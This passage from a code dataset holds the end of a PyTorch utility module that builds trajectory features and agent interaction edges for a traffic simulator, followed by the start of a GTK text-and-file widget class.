1, 1]\n ) + ped_feature * ped_mask.view([*raw_type.shape, 1, 1])\n\n type_embedding = F.one_hot(raw_type, 16)\n\n feature = torch.cat(\n (feature, type_embedding.unsqueeze(-2).repeat(1, 1, feature.size(2), 1)),\n dim=-1,\n )\n feature = feature * mask.unsqueeze(-1)\n\n return feature\n\n\ndef raw_to_states(batch_raw):\n raw_type = batch_raw[\"raw_types\"]\n pos = batch_raw[\"history_positions\"]\n vel = batch_raw[\"history_velocities\"]\n yaw = batch_raw[\"history_yaws\"]\n avail_mask = batch_raw[\"history_availabilities\"]\n\n veh_mask, ped_mask = get_agent_masks(raw_type) # [B, (A)]\n\n # all vehicles, cyclists, and motorcyclists\n state_veh = torch.cat((pos, vel, yaw), dim=-1) # [B, (A), T, S]\n # pedestrians and animals\n state_ped = torch.cat((pos, vel * torch.cos(yaw), vel * torch.sin(yaw)), dim=-1) # [B, (A), T, S]\n\n state = state_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + state_ped * ped_mask.view([*raw_type.shape, 1, 1]) # [B, (A), T, S]\n\n # Get the current state of the agents\n num = torch.arange(0, 
avail_mask.shape[-1]).view(1, 1, -1).to(avail_mask.device)\n nummask = num * avail_mask\n last_idx, _ = torch.max(nummask, dim=2)\n curr_state = torch.gather(\n state, 2, last_idx[..., None, None].repeat(1, 1, 1, 4)\n )\n return state, curr_state\n\n\ndef batch_to_raw_ego(data_batch, step_time):\n batch_size = data_batch[\"history_positions\"].shape[0]\n raw_type = torch.ones(batch_size).type(torch.int64).to(data_batch[\"history_positions\"].device) # [B, T]\n raw_type = raw_type * 3 # index for type PERCEPTION_LABEL_CAR\n\n src_pos = torch.flip(data_batch[\"history_positions\"], dims=[-2])\n src_yaw = torch.flip(data_batch[\"history_yaws\"], dims=[-2])\n src_mask = torch.flip(data_batch[\"history_availabilities\"], dims=[-1]).bool()\n\n src_vel = dynamics.Unicycle.calculate_vel(pos=src_pos, yaw=src_yaw, dt=step_time, mask=src_mask)\n src_vel[:, -1] = data_batch[\"curr_speed\"].unsqueeze(-1)\n\n raw = {\n \"history_positions\": src_pos,\n \"history_velocities\": src_vel,\n \"history_yaws\": src_yaw,\n \"raw_types\": raw_type,\n \"history_availabilities\": src_mask,\n \"extents\": data_batch[\"extents\"]\n }\n\n raw = TensorUtils.unsqueeze(raw, dim=1) # Add the agent dimension\n return raw\n\n\ndef raw2feature(pos, vel, yaw, raw_type, mask, lanes=None, add_noise=False):\n \"map raw src into features of dim 21+lane dim\"\n\n \"\"\"\n PERCEPTION_LABELS = [\n \"PERCEPTION_LABEL_NOT_SET\",\n \"PERCEPTION_LABEL_UNKNOWN\",\n \"PERCEPTION_LABEL_DONTCARE\",\n \"PERCEPTION_LABEL_CAR\",\n \"PERCEPTION_LABEL_VAN\",\n \"PERCEPTION_LABEL_TRAM\",\n \"PERCEPTION_LABEL_BUS\",\n \"PERCEPTION_LABEL_TRUCK\",\n \"PERCEPTION_LABEL_EMERGENCY_VEHICLE\",\n \"PERCEPTION_LABEL_OTHER_VEHICLE\",\n \"PERCEPTION_LABEL_BICYCLE\",\n \"PERCEPTION_LABEL_MOTORCYCLE\",\n \"PERCEPTION_LABEL_CYCLIST\",\n \"PERCEPTION_LABEL_MOTORCYCLIST\",\n \"PERCEPTION_LABEL_PEDESTRIAN\",\n \"PERCEPTION_LABEL_ANIMAL\",\n \"AVRESEARCH_LABEL_DONTCARE\",\n ]\n \"\"\"\n dyn_type = torch.zeros_like(raw_type)\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n veh_mask = veh_mask | ped_mask\n ped_mask = ped_mask * 0\n dyn_type += dynamics.DynType.UNICYCLE * veh_mask\n # all vehicles, cyclists, and motorcyclists\n if add_noise:\n pos_noise = torch.randn(pos.size(0), 1, 1, 2).to(pos.device) * 0.5\n yaw_noise = torch.randn(pos.size(0), 1, 1, 1).to(pos.device) * 0.1\n if pos.ndim == 5:\n pos_noise = pos_noise.unsqueeze(1)\n yaw_noise = yaw_noise.unsqueeze(1)\n feature_veh = torch.cat(\n (\n pos + pos_noise,\n vel,\n torch.cos(yaw + yaw_noise),\n torch.sin(yaw + yaw_noise),\n ),\n dim=-1,\n )\n else:\n feature_veh = torch.cat((pos, vel, torch.cos(yaw), torch.sin(yaw)), dim=-1)\n\n state_veh = torch.cat((pos, vel, yaw), dim=-1)\n\n # pedestrians and animals\n if add_noise:\n pos_noise = torch.randn(pos.size(0), 1, 1, 2).to(pos.device) * 0.5\n yaw_noise = torch.randn(pos.size(0), 1, 1, 1).to(pos.device) * 0.1\n if pos.ndim == 5:\n pos_noise = pos_noise.unsqueeze(1)\n yaw_noise = yaw_noise.unsqueeze(1)\n ped_feature = torch.cat(\n (\n pos + pos_noise,\n vel,\n vel * torch.sin(yaw + yaw_noise),\n vel * torch.cos(yaw + yaw_noise),\n ),\n dim=-1,\n )\n else:\n ped_feature = torch.cat(\n (pos, vel, vel * torch.sin(yaw), vel * torch.cos(yaw)), dim=-1\n )\n state_ped = torch.cat((pos, vel * torch.cos(yaw), vel * torch.sin(yaw)), dim=-1)\n state = state_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + state_ped * ped_mask.view([*raw_type.shape, 1, 1])\n dyn_type += dynamics.DynType.DI * ped_mask\n\n feature = 
feature_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + ped_feature * ped_mask.view([*raw_type.shape, 1, 1])\n\n type_embedding = F.one_hot(raw_type, 16)\n\n if pos.ndim == 4:\n if lanes is not None:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, feature.size(2), 1),\n lanes[:, :, None, :].repeat(1, 1, feature.size(2), 1),\n ),\n dim=-1,\n )\n else:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, feature.size(2), 1),\n ),\n dim=-1,\n )\n\n elif pos.ndim == 5:\n if lanes is not None:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, 1, feature.size(-2), 1),\n lanes[:, :, None, None, :].repeat(\n 1, feature.size(1), 1, feature.size(2), 1\n ),\n ),\n dim=-1,\n )\n else:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, 1, feature.size(-2), 1),\n ),\n dim=-1,\n )\n feature = feature * mask.unsqueeze(-1)\n return feature, dyn_type, state\n\n\ndef batch_to_vectorized_feature(data_batch, dyn_list, step_time, algo_config):\n device = data_batch[\"history_positions\"].device\n raw_type = torch.cat(\n (data_batch[\"type\"].unsqueeze(1), data_batch[\"all_other_agents_types\"]),\n dim=1,\n ).type(torch.int64)\n extents = torch.cat(\n (\n data_batch[\"extent\"][..., :2].unsqueeze(1),\n torch.max(data_batch[\"all_other_agents_history_extents\"], dim=-2)[0],\n ),\n dim=1,\n )\n\n src_pos = torch.cat(\n (\n data_batch[\"history_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_positions\"],\n ),\n dim=1,\n )\n \"history position and yaw need to be flipped so that they go from past to recent\"\n src_pos = torch.flip(src_pos, dims=[-2])\n src_yaw = torch.cat(\n (\n data_batch[\"history_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_yaws\"],\n ),\n dim=1,\n )\n src_yaw = torch.flip(src_yaw, dims=[-2])\n src_world_yaw = src_yaw + (\n data_batch[\"yaw\"]\n .view(-1, 1, 1, 1)\n .repeat(1, src_yaw.size(1), src_yaw.size(2), 1)\n ).type(torch.float)\n src_mask = torch.cat(\n (\n data_batch[\"history_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_availability\"],\n ),\n dim=1,\n ).bool()\n\n src_mask = torch.flip(src_mask, dims=[-1])\n # estimate velocity\n src_vel = dyn_list[dynamics.DynType.UNICYCLE].calculate_vel(\n src_pos, src_yaw, step_time, src_mask\n )\n\n src_vel[:, 0, -1] = torch.clip(\n data_batch[\"curr_speed\"].unsqueeze(-1),\n min=algo_config.vmin,\n max=algo_config.vmax,\n )\n if algo_config.vectorize_lane:\n src_lanes = torch.cat(\n (\n data_batch[\"ego_lanes\"].unsqueeze(1),\n data_batch[\"all_other_agents_lanes\"],\n ),\n dim=1,\n ).type(torch.float)\n src_lanes = torch.cat((\n src_lanes[...,0:2],\n torch.cos(src_lanes[...,2:3]),\n torch.sin(src_lanes[...,2:3]),\n src_lanes[...,-1:],\n ),dim=-1)\n src_lanes = src_lanes.view(*src_lanes.shape[:2], -1)\n else:\n src_lanes = None\n src, dyn_type, src_state = raw2feature(\n src_pos, src_vel, src_yaw, raw_type, src_mask, src_lanes\n )\n tgt_mask = torch.cat(\n (\n data_batch[\"target_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_availability\"],\n ),\n dim=1,\n ).bool()\n num = torch.arange(0, src_mask.shape[2]).view(1, 1, -1).to(src_mask.device)\n nummask = num * src_mask\n last_idx, _ = torch.max(nummask, dim=2)\n curr_state = torch.gather(\n src_state, 2, last_idx[..., None, None].repeat(1, 1, 1, 4)\n )\n\n tgt_pos = torch.cat(\n (\n data_batch[\"target_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_positions\"],\n 
),\n dim=1,\n )\n tgt_yaw = torch.cat(\n (\n data_batch[\"target_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_yaws\"],\n ),\n dim=1,\n )\n tgt_pos_yaw = torch.cat((tgt_pos, tgt_yaw), dim=-1)\n \n\n # curr_pos_yaw = torch.cat((curr_state[..., 0:2], curr_yaw), dim=-1)\n\n # tgt = tgt - curr_pos_yaw.repeat(1, 1, tgt.size(2), 1) * tgt_mask.unsqueeze(-1)\n\n\n return (\n src,\n dyn_type,\n src_state,\n src_pos,\n src_yaw,\n src_world_yaw,\n src_vel,\n raw_type,\n src_mask,\n src_lanes,\n extents,\n tgt_pos_yaw,\n tgt_mask,\n curr_state,\n )\n\ndef obtain_goal_state(tgt_pos_yaw,tgt_mask):\n num = torch.arange(0, tgt_mask.shape[2]).view(1, 1, -1).to(tgt_mask.device)\n nummask = num * tgt_mask\n last_idx, _ = torch.max(nummask, dim=2, keepdim=True)\n last_mask = nummask.ge(last_idx)\n \n goal_mask = tgt_mask*last_mask\n goal_pos_yaw = tgt_pos_yaw*goal_mask.unsqueeze(-1)\n return goal_pos_yaw[...,:2], goal_pos_yaw[...,2:], goal_mask\n\n\ndef batch_to_raw_all_agents(data_batch, step_time):\n raw_type = torch.cat(\n (data_batch[\"type\"].unsqueeze(1), data_batch[\"all_other_agents_types\"]),\n dim=1,\n ).type(torch.int64)\n\n src_pos = torch.cat(\n (\n data_batch[\"history_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_positions\"],\n ),\n dim=1,\n )\n # history position and yaw need to be flipped so that they go from past to recent\n src_pos = torch.flip(src_pos, dims=[-2])\n src_yaw = torch.cat(\n (\n data_batch[\"history_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_yaws\"],\n ),\n dim=1,\n )\n src_yaw = torch.flip(src_yaw, dims=[-2])\n src_mask = torch.cat(\n (\n data_batch[\"history_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_availability\"],\n ),\n dim=1,\n ).bool()\n\n src_mask = torch.flip(src_mask, dims=[-1])\n\n extents = torch.cat(\n (\n data_batch[\"extent\"][..., :2].unsqueeze(1),\n torch.max(data_batch[\"all_other_agents_history_extents\"], dim=-2)[0],\n ),\n dim=1,\n )\n\n # estimate velocity\n src_vel = dynamics.Unicycle.calculate_vel(src_pos, src_yaw, step_time, src_mask)\n src_vel[:, 0, -1] = data_batch[\"curr_speed\"].unsqueeze(-1)\n\n return {\n \"history_positions\": src_pos,\n \"history_yaws\": src_yaw,\n \"curr_speed\": src_vel[:, :, -1, 0],\n \"raw_types\": raw_type,\n \"history_availabilities\": src_mask,\n \"extents\": extents,\n }\n\n\ndef batch_to_target_all_agents(data_batch):\n pos = torch.cat(\n (\n data_batch[\"target_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_positions\"],\n ),\n dim=1,\n )\n yaw = torch.cat(\n (\n data_batch[\"target_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_yaws\"],\n ),\n dim=1,\n )\n avails = torch.cat(\n (\n data_batch[\"target_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_availability\"],\n ),\n dim=1,\n )\n\n extents = torch.cat(\n (\n data_batch[\"extent\"][..., :2].unsqueeze(1),\n torch.max(data_batch[\"all_other_agents_history_extents\"], dim=-2)[0],\n ),\n dim=1,\n )\n\n return {\n \"target_positions\": pos,\n \"target_yaws\": yaw,\n \"target_availabilities\": avails,\n \"extents\": extents\n }\n\n\ndef generate_edges(\n raw_type,\n extents,\n pos_pred,\n yaw_pred,\n edge_mask = None,\n):\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n\n agent_mask = veh_mask | ped_mask\n edge_types = [\"VV\", \"VP\", \"PV\", \"PP\"]\n edges = {et: list() for et in edge_types}\n for i in range(agent_mask.shape[0]):\n agent_idx = torch.where(agent_mask[i] != 
0)[0]\n edge_idx = torch.combinations(agent_idx, r=2)\n VV_idx = torch.where(\n veh_mask[i, edge_idx[:, 0]] & veh_mask[i, edge_idx[:, 1]]\n )[0]\n VP_idx = torch.where(\n veh_mask[i, edge_idx[:, 0]] & ped_mask[i, edge_idx[:, 1]]\n )[0]\n PV_idx = torch.where(\n ped_mask[i, edge_idx[:, 0]] & veh_mask[i, edge_idx[:, 1]]\n )[0]\n PP_idx = torch.where(\n ped_mask[i, edge_idx[:, 0]] & ped_mask[i, edge_idx[:, 1]]\n )[0]\n if pos_pred.ndim == 4:\n edges_of_all_types = torch.cat(\n (\n pos_pred[i, edge_idx[:, 0], :],\n yaw_pred[i, edge_idx[:, 0], :],\n pos_pred[i, edge_idx[:, 1], :],\n yaw_pred[i, edge_idx[:, 1], :],\n extents[i, edge_idx[:, 0]]\n .unsqueeze(-2)\n .repeat(1, pos_pred.size(-2), 1),\n extents[i, edge_idx[:, 1]]\n .unsqueeze(-2)\n .repeat(1, pos_pred.size(-2), 1),\n ),\n dim=-1,\n )\n edges[\"VV\"].append(edges_of_all_types[VV_idx])\n edges[\"VP\"].append(edges_of_all_types[VP_idx])\n edges[\"PV\"].append(edges_of_all_types[PV_idx])\n edges[\"PP\"].append(edges_of_all_types[PP_idx])\n elif pos_pred.ndim == 5:\n\n edges_of_all_types = torch.cat(\n (\n pos_pred[i, :, edge_idx[:, 0], :],\n yaw_pred[i, :, edge_idx[:, 0], :],\n pos_pred[i, :, edge_idx[:, 1], :],\n yaw_pred[i, :, edge_idx[:, 1], :],\n extents[i, None, edge_idx[:, 0], None, :].repeat(\n pos_pred.size(1), 1, pos_pred.size(-2), 1\n ),\n extents[i, None, edge_idx[:, 1], None, :].repeat(\n pos_pred.size(1), 1, pos_pred.size(-2), 1\n ),\n ),\n dim=-1,\n )\n edges[\"VV\"].append(edges_of_all_types[:, VV_idx])\n edges[\"VP\"].append(edges_of_all_types[:, VP_idx])\n edges[\"PV\"].append(edges_of_all_types[:, PV_idx])\n edges[\"PP\"].append(edges_of_all_types[:, PP_idx])\n if pos_pred.ndim == 4:\n for et, v in edges.items():\n edges[et] = torch.cat(v, dim=0)\n elif pos_pred.ndim == 5:\n for et, v in edges.items():\n edges[et] = torch.cat(v, dim=1)\n return edges\n\ndef gen_edges_masked(raw_type,\n extents,\n pred):\n\n B,Na,T = pred.shape[:3]\n\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n\n edges = torch.zeros([B,Na,Na,T,10]).to(pred.device)\n edges[...,:3] = pred.unsqueeze(2)\n edges[...,3:6] = pred.unsqueeze(1)\n edges[...,6:8] = extents.unsqueeze(2).unsqueeze(3)\n edges[...,8:] = extents.unsqueeze(1).unsqueeze(3)\n self_mask = ~torch.eye(Na,dtype=bool,device=raw_type.device).unsqueeze(0)\n VV_mask = torch.logical_and(veh_mask.unsqueeze(2),veh_mask.unsqueeze(1))\n VV_mask = torch.logical_and(self_mask,VV_mask)\n\n VP_mask = torch.logical_and(veh_mask.unsqueeze(2),ped_mask.unsqueeze(1))\n VP_mask = torch.logical_and(self_mask,VP_mask)\n\n PV_mask = torch.logical_and(ped_mask.unsqueeze(2),veh_mask.unsqueeze(1))\n PV_mask = torch.logical_and(self_mask,PV_mask)\n\n PP_mask = torch.logical_and(ped_mask.unsqueeze(2),ped_mask.unsqueeze(1))\n PP_mask = torch.logical_and(self_mask,PP_mask)\n\n\n type_mask = dict(\n VV = VV_mask,\n VP = VP_mask,\n PV = PV_mask,\n PP = PP_mask\n )\n return edges,type_mask\n\n\ndef gen_ego_edges(ego_trajectories, agent_trajectories, ego_extents, agent_extents, raw_types):\n \"\"\"generate edges between ego trajectory samples and agent trajectories\n\n Args:\n ego_trajectories (torch.Tensor): [B,N,T,3]\n agent_trajectories (torch.Tensor): [B,A,T,3] or [B,N,A,T,3]\n ego_extents (torch.Tensor): [B,2]\n agent_extents (torch.Tensor): [B,A,2]\n raw_types (torch.Tensor): [B,A]\n Returns:\n edges (torch.Tensor): [B,N,A,T,10]\n type_mask (dict)\n \"\"\"\n B,N,T = ego_trajectories.shape[:3]\n A = agent_trajectories.shape[-3]\n\n veh_mask = (raw_types >= 3) & 
(raw_types <= 13)\n ped_mask = (raw_types == 14) | (raw_types == 15)\n\n edges = torch.zeros([B,N,A,T,10]).to(ego_trajectories.device)\n edges[...,:3] = ego_trajectories.unsqueeze(2).repeat(1,1,A,1,1)\n if agent_trajectories.ndim==4:\n edges[...,3:6] = agent_trajectories.unsqueeze(1).repeat(1,N,1,1,1)\n else:\n edges[...,3:6] = agent_trajectories\n edges[...,6:8] = ego_extents.reshape(B,1,1,1,2).repeat(1,N,A,T,1)\n edges[...,8:] = agent_extents.reshape(B,1,A,1,2).repeat(1,N,1,T,1)\n type_mask = {\"VV\":veh_mask,\"VP\":ped_mask}\n return edges,type_mask\n\n\ndef gen_EC_edges(ego_trajectories,agent_trajectories,ego_extents, agent_extents, raw_types,mask=None):\n \"\"\"generate edges between ego trajectory samples and agent trajectories\n\n Args:\n ego_trajectories (torch.Tensor): [B,A,T,3]\n agent_trajectories (torch.Tensor): [B,A,T,3]\n ego_extents (torch.Tensor): [B,2]\n agent_extents (torch.Tensor): [B,A,2]\n raw_types (torch.Tensor): [B,A]\n mask (optional, torch.Tensor): [B,A]\n Returns:\n edges (torch.Tensor): [B,N,A,T,10]\n type_mask (dict)\n \"\"\"\n\n B,A = ego_trajectories.shape[:2]\n T = ego_trajectories.shape[-2]\n\n veh_mask = (raw_types >= 3) & (raw_types <= 13)\n ped_mask = (raw_types == 14) | (raw_types == 15)\n\n \n if ego_trajectories.ndim==4:\n edges = torch.zeros([B,A,T,10]).to(ego_trajectories.device)\n edges[...,:3] = ego_trajectories\n edges[...,3:6] = agent_trajectories\n edges[...,6:8] = ego_extents.reshape(B,1,1,2).repeat(1,A,T,1)\n edges[...,8:] = agent_extents.unsqueeze(2).repeat(1,1,T,1)\n elif ego_trajectories.ndim==5:\n \n K = ego_trajectories.shape[2]\n edges = torch.zeros([B,A*K,T,10]).to(ego_trajectories.device)\n edges[...,:3] = TensorUtils.join_dimensions(ego_trajectories,1,3)\n edges[...,3:6] = agent_trajectories.repeat(1,K,1,1)\n edges[...,6:8] = ego_extents.reshape(B,1,1,2).repeat(1,A*K,T,1)\n edges[...,8:] = agent_extents.unsqueeze(2).repeat(1,K,T,1)\n veh_mask = veh_mask.tile(1,K)\n ped_mask = ped_mask.tile(1,K)\n if mask is not None:\n veh_mask = veh_mask*mask\n ped_mask = ped_mask*mask\n type_mask = {\"VV\":veh_mask,\"VP\":ped_mask}\n return edges,type_mask\n \n\ndef get_edges_from_batch(data_batch, ego_predictions=None, all_predictions=None):\n raw_type = torch.cat(\n (data_batch[\"type\"].unsqueeze(1), data_batch[\"all_other_agents_types\"]),\n dim=1,\n ).type(torch.int64)\n\n # Use predicted ego position to compute future box edges\n\n targets_all = batch_to_target_all_agents(data_batch)\n if ego_predictions is not None:\n targets_all[\"target_positions\"] [:, 0, :, :] = ego_predictions[\"positions\"]\n targets_all[\"target_yaws\"][:, 0, :, :] = ego_predictions[\"yaws\"]\n elif all_predictions is not None:\n targets_all[\"target_positions\"] = all_predictions[\"positions\"]\n targets_all[\"target_yaws\"] = all_predictions[\"yaws\"]\n else:\n raise ValueError(\"Please specify either ego prediction or all predictions\")\n\n pred_edges = generate_edges(\n raw_type, targets_all[\"extents\"],\n pos_pred=targets_all[\"target_positions\"],\n yaw_pred=targets_all[\"target_yaws\"]\n )\n return pred_edges\n\n\ndef get_last_available_index(avails):\n \"\"\"\n Args:\n avails (torch.Tensor): target availabilities [B, (A), T]\n\n Returns:\n last_indices (torch.Tensor): index of the last available frame\n \"\"\"\n num_frames = avails.shape[-1]\n inds = torch.arange(0, num_frames).to(avails.device) # [T]\n inds = (avails > 0).float() * inds # [B, (A), T] arange indices with unavailable indices set to 0\n last_inds = inds.max(dim=-1)[1] # [B, (A)] calculate the 
index of the last available frame\n    return last_inds\n\n\ndef get_current_states(batch: dict, dyn_type: dynamics.DynType) -> torch.Tensor:\n    bs = batch[\"curr_speed\"].shape[0]\n    if dyn_type == dynamics.DynType.BICYCLE:\n        current_states = torch.zeros(bs, 6).to(batch[\"curr_speed\"].device) # [x, y, yaw, vel, dh, veh_len]\n        current_states[:, 3] = batch[\"curr_speed\"].abs()\n        current_states[:, [4]] = (batch[\"history_yaws\"][:, 0] - batch[\"history_yaws\"][:, 1]).abs()\n        current_states[:, 5] = batch[\"extent\"][:, 0] # [veh_len]\n    else:\n        current_states = torch.zeros(bs, 4).to(batch[\"curr_speed\"].device) # [x, y, vel, yaw]\n        current_states[:, 2] = batch[\"curr_speed\"]\n    return current_states\n\n\ndef get_current_states_all_agents(batch: dict, step_time, dyn_type: dynamics.DynType) -> torch.Tensor:\n    if batch[\"history_positions\"].ndim==3:\n        state_all = batch_to_raw_all_agents(batch, step_time)\n    else:\n        state_all = batch\n    bs, na = state_all[\"curr_speed\"].shape[:2]\n    if dyn_type == dynamics.DynType.BICYCLE:\n        current_states = torch.zeros(bs, na, 6).to(state_all[\"curr_speed\"].device) # [x, y, yaw, vel, dh, veh_len]\n        current_states[:, :, :2] = state_all[\"history_positions\"][:, :, 0]\n        current_states[:, :, 3] = state_all[\"curr_speed\"].abs()\n        current_states[:, :, [4]] = (state_all[\"history_yaws\"][:, :, 0] - state_all[\"history_yaws\"][:, :, 1]).abs()\n        current_states[:, :, 5] = state_all[\"extent\"][:, :, 0] # [veh_len]\n    else:\n        current_states = torch.zeros(bs, na, 4).to(state_all[\"curr_speed\"].device) # [x, y, vel, yaw]\n        current_states[:, :, :2] = state_all[\"history_positions\"][:, :, 0]\n        current_states[:, :, 2] = state_all[\"curr_speed\"]\n        current_states[:,:,3:] = state_all[\"history_yaws\"][:,:,0]\n    return current_states\n\n\ndef get_drivable_region_map(rasterized_map):\n    return rasterized_map[..., -3, :, :] < 1.\n\n\ndef get_modality_shapes(cfg: ExperimentConfig):\n    assert cfg.env.rasterizer.map_type == \"py_semantic\"\n    num_channels = (cfg.algo.history_num_frames + 1) * 2 + 3\n    h, w = cfg.env.rasterizer.raster_size\n    return dict(image=(num_channels, h, w))","repo_name":"NVlabs/traffic-behavior-simulation","sub_path":"tbsim/utils/l5_utils.py","file_name":"l5_utils.py","file_ext":"py","file_size_in_byte":25947,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"39"} +{"seq_id":"29206611340","text":"from gi.repository import Gtk, Adw, GObject, Gio, GtkSource, Gdk, GLib\nfrom gettext import gettext as _\nfrom typing import List\nimport humanize\n\nfrom devtoolbox.utils import Utils\n\n\n@Gtk.Template(resource_path='/me/iepure/devtoolbox/ui/widgets/text_file_area.ui')\nclass TextFileArea(Adw.Bin):\n    __gtype_name__ = \"TextFileArea\"\n\n    # Template elements\n    _name_lbl = Gtk.Template.Child()\n    _spinner = Gtk.Template.Child()\n    _spinner_separator = Gtk.Template.Child()\n    _action_btn = Gtk.Template.Child()\n    _action_btn_separator = Gtk.Template.Child()\n    _view_btn = Gtk.Template.Child()\n    _open_btn = Gtk.Template.Child()\n    _save_btn = Gtk.Template.Child()\n    _copy_btn = Gtk.Template.Child()\n    _paste_btn = Gtk.Template.Child()\n    _clear_btn = Gtk.Template.Child()\n    _stack = Gtk.Template.Child()\n    _textview = Gtk.Template.Child()\n    _imageview = Gtk.Template.Child()\n    _fileview = Gtk.Template.Child()\n    _loading_lbl = Gtk.Template.Child()\n\n    # GSettings\n    _settings = Gio.Settings(schema_id=\"me.iepure.devtoolbox\")\n\n    # Properties\n    name = GObject.Property(type=str, default=\"\")\n    show_spinner = GObject.Property(type=bool, 
default=False)\n show_view_btn = GObject.Property(type=bool, default=False)\n show_clear_btn = GObject.Property(type=bool, default=False)\n show_save_btn = GObject.Property(type=bool, default=False)\n show_copy_btn = GObject.Property(type=bool, default=False)\n show_open_btn = GObject.Property(type=bool, default=False)\n show_paste_btn = GObject.Property(type=bool, default=False)\n show_action_btn = GObject.Property(type=bool, default=False)\n action_btn_name = GObject.Property(type=str, default=\"\")\n text_editable = GObject.Property(type=bool, default=True)\n text_show_line_numbers = GObject.Property(type=bool, default=False)\n text_highlight_current_line = GObject.Property(type=bool, default=False)\n text_syntax_highlighting = GObject.Property(type=bool, default=False)\n text_language_highlight = GObject.Property(type=str, default=\"\")\n text_wrap_mode = GObject.Property(type=Gtk.WrapMode, default=Gtk.WrapMode.NONE)\n area_height = GObject.Property(type=int, default=200)\n use_default_text_extensions = GObject.Property(type=bool, default=False)\n use_default_image_extensions = GObject.Property(type=bool, default=False)\n use_all_files_extensions = GObject.Property(type=bool, default=False)\n use_custom_file_extensions = GObject.Property(type=bool, default=False)\n custom_file_extensions = GObject.Property(type=GObject.TYPE_STRV)\n loading_label = GObject.Property(type=str, default=_(\"Opening file...\"))\n allow_drag_and_drop = GObject.Property(type=bool, default=True)\n\n # Custom signals\n __gsignals__ = {\n \"action-clicked\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"text-changed\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"view-cleared\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"text-loaded\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"image-loaded\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"file-loaded\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"big-file\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"error\": (GObject.SIGNAL_RUN_LAST, None, (str,)),\n \"saved\": (GObject.SIGNAL_RUN_LAST, None, (str,)),\n }\n\n def __init__(self):\n super().__init__()\n\n self.set_property(\"css-name\", \"textfilearea\")\n\n # Set theme\n language = GtkSource.LanguageManager.get_default().get_language(self.text_language_highlight)\n if Adw.StyleManager.get_default().get_dark():\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita-dark\")\n else:\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita\")\n self._textview.get_buffer().set_language(language)\n self._textview.get_buffer().set_style_scheme(style_scheme)\n\n # Drag and drop\n content = Gdk.ContentFormats.new_for_gtype(Gdk.FileList)\n target = Gtk.DropTarget(formats=content, actions=Gdk.DragAction.COPY)\n target.connect('drop', self._on_dnd_drop)\n self._textview.add_controller(target)\n\n # Property binding\n self.bind_property(\"name\", self._name_lbl, \"label\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-spinner\", self._spinner, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-spinner\", self._spinner_separator, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-view-btn\", self._view_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-clear-btn\", self._clear_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-copy-btn\", self._copy_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-open-btn\", self._open_btn, \"visible\", 
GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-save-btn\", self._save_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-paste-btn\", self._paste_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-action-btn\", self._action_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-action-btn\", self._action_btn_separator, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"action-btn-name\", self._action_btn, \"label\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-editable\", self._textview, \"editable\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-syntax-highlighting\", self._textview.get_buffer(), \"highlight-syntax\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-syntax-highlighting\", self._textview.get_buffer(), \"highlight-matching-brackets\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-show-line-numbers\", self._textview, \"show-line-numbers\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-highlight-current-line\", self._textview, \"highlight-current-line\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-wrap-mode\", self._textview, \"wrap-mode\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"area-height\", self._textview, \"height-request\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"loading-label\", self._loading_lbl, 